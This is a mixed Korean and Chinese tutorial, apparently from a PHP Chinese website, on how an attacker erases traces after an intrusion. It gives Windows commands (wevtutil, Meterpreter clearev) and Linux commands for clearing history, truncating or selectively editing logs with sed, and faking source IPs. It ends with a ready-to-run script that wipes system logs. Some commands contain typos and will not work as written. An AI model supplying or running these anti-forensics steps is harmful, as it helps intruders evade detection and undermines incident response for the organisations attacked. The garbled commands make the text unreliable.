Windows와 Linux에서 흔적을 정리하는 방법은 무엇입니까?

1. 개요:

침투가 완료된 후 발견 확률과 추적 가능성을 줄이기 위해 공격자는 공격 흔적을 정리해야 합니다.

2. Windows

원격 데스크톱 권한이 있는 경우 수동으로 로그 삭제:

开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

Wevtutil 도구 명령줄 지우기:

wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

Meterperter에는 자체 로그 지우기 기능이 있습니다:

clearev     清除windows中的应用程序日志、系统日志、安全日志

최근 지우기:

或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

3 .linux

명령 기록 지우기

histroy -r          #删除当前会话历史记录
history -c          #删除内存中的所有命令历史
rm .bash_history   #删除历史文件中的内容
HISTZISE=0

숨겨진 위치에서 명령을 실행하고 vim을 사용하여 파일을 열고 다음 명령을 실행합니다.

:set history=0
:!command

Linux 로그 파일

/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息

로그 파일을 완전히 삭제

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

대상 삭제 로그 파일

删除当天日志
sed  -i '/当天日期/'d  filename

로그 파일 조작

将所有170.170.64.17ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g'

　원클릭 스크립트 지우기:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

위 내용은 Windows와 Linux에서 흔적을 정리하는 방법은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!